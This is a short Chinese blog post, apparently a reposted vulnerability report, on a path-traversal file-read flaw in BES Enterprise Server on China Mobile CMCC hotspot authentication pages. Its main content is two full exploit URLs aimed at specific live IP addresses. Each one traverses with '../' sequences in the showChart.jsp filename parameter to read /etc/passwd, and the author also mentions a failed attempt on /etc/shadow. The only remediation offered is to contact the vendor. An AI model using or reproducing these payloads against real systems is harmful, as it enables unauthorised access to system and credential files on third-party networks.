BES Enterprise Server文件读取漏洞(多地移动CMCC热点

时间: 2020-10-11|tag: 25次围观|0 条评论

BES Enterprise Server文件读取漏洞,貌似是应用服务器,用的人应该还是蛮多的

看着网络连接中那么多的无线热点,却没有一个是我的。。。。T_T

然后我就选择了CMCC,虽然还是无法访问其他互联网网站,但是CMCC自己的web页面还是可以访问的,然后就。。。。没有然后了

为什么不能从互联网直接访问移动WLAN的认证页面?!这不科学

找了湖北移动的WLAN和辽宁移动的一个ip做案例

湖北移动WLAN

http://221.176.1.140:8080/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd

这个链接好像不能通过互联网直接访问,需要连接CMCC的热点后才能访问

辽宁移动

http://211.137.34.226/showChart.jsp?filename=.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././.././../etc/passwd

不晓得为什么不能读取shadow文件

CMCC:
 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图

 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图1

 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图2

 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图3

用户还挺多的~
 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图4

看了这个hosts,觉得移动的设备还是很多的。。。
 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图5

 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图6

 

BES Enterprise Server文件读取漏洞(多地移动CMCC热点插图7

 

修复方案:

联系厂商
    上一篇: 万户OA两处盲注DBA权限(无需登陆) - 网站安全

    下一篇: 某通用型企业建站系统SQL注入 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《BES Enterprise Server文件读取漏洞(多地移动CMCC热点
   

还没有人抢沙发呢~